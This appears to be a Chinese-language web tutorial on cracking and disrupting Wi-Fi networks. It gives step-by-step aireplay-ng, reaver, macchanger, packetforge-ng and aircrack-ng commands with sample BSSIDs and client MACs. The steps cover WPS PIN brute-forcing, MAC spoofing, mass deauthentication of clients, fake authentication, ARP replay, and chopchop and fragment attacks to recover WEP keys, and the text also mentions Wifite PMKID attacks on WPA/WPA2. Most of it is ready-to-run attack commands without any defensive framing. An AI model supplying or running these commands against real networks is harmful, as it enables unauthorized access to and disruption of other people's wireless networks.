aireplay包注入攻击
Micr067 人气:3reaver爆破WPS PIN码:
airodump-ng wlan0
reaver -i wlan0 -b D0:76:E7:51:2A:78 -vv
macchanger更改MAC地址:
macchanger -r wlan0
-r:随机更换MAC
-m:设置指定的MAC地址
macchanger -m 72:8e:9c:2d:a8:bb wlan0
airodump-ng --bssid 50:2B:73:18:ED:81 -c 2 -w test wlan0mon
当目标在有客户端在进行下载、看视频等操作时Date值会剧增。
此时开启wireshark打开airodump-ng捕获的cap数据包,可以看到客户端与路由器之间的交互信息
为了能够快速获得大量有用的数据包,可以使用deauth攻击将客户端与目标AP的连接打断再重连。
aireplay-ng --deauth 20000 -a 50:2B:73:18:ED:81 -c A4:50:46:E0:FA:06 wlan0mon
airodump-ng --bssid 50:2B:73:18:ED:81 -c 2 -w test wlan0mon
50:2B:73:18:ED:81 00:02:6f:be:66:41
fakeauth攻击
当目标AP无客户端连接时,我们可以使用无线网卡进行fakeauth(伪认证)攻击与目标AP交互。
查看无线网卡MAC使用macchanger -s wlan0mon命令。
aireplay-ng --fakeauth 0 -a 50:2B:73:18:ED:81 -c 00:02:6f:be:66:41 wlan0mon
--fakeauth delay:伪装一个客户端和AP进行连接,其中delay表示连接的延迟时间。
ArpRequest注入攻击
ArpRequest注入攻击是一种抓包后分析重发的过程,通过这种方式可以刺激产生大量交互数据。
aireplay-ng --arpreplay -b 50:2B:73:18:ED:81 -h 00:02:6F:BE:66:41 wlan0mon
chopchop攻击
aireplay-ng --chopchop -a 50:2B:73:18:ED:81 -h 00:02:6F:BE:66:41 wlan0mon
--chopchop:快速攻击模式,该攻击模式用来获得一个包含密钥数据的xor文件。
然后使用Packetforge-ng(网络数据包伪造工具)伪造数据包,packetforge-ng使用方法如下:
packetforge-ng <mode> <options>
packetforge-ng -0 -a 50:2B:73:18:ED:81 -c 00:02:6F:BE:66:41 -k 255.255.255.255 -l 255.255.255.255 -y replay-1219-232225.xor -w chopchop-packet
-0,--arp:伪造一个arp的数据包
-l <ip[:port]> : 设置源IP地址和端口
-k <ip[:port]> : 设置目标IP地址和端口
-y <file> : 从指定文件读取PRGA(wep加密中间量)
aireplay-ng -2 -r chopchop-packet wlan0mon
-2,--interactive : 交互式帧选择
-r <file> : 从pcap文件中提取数据包
aircrack-ng chopchop-01.cap
fragment攻击
fargmentg攻击通过生成有效的密钥流来进一步进行来破解无线密码。
aireplay-ng --fragment -a 50:2B:73:18:ED:81 -c 00:02:6F:BE:66:41 wlan0mon
packetforge-ng -0 -a 50:2B:73:18:ED:81 -c 00:02:6F:BE:66:41 -k 255.255.255.255 -l 255.255.255.255 -y fragment-1219-232225.xor -w fargment-packet
aireplay-ng -2 -r fragment-packet wlan0mon
aircrack-ng fragment-01.cap
WiFite破解WEP/WPA/WPA2
Wifite是一款自动化wifi密码破解工具,特点是支持多个wep,wpa加密的wifi网络,而且过程自动配置,无需人员干预!而且WiFi支持调用hcxdumptool、hcxtools和hashcat进行PMKID攻击。
PMKID攻击是一种无需四次握手包即可破解WPA&WPA2密码的攻击方式,使用PMKID破解WPA预共享密钥的方法,与现有的其它破解方法不同,该方法不再需要抓取完整的EAPOL四次握手包,只需要一个EAPOL帧中的RSN IE(Robust Security Network Information Element)即可,具体可以参考
https://www.freebuf.com/articles/wireless/179953.html
加载全部内容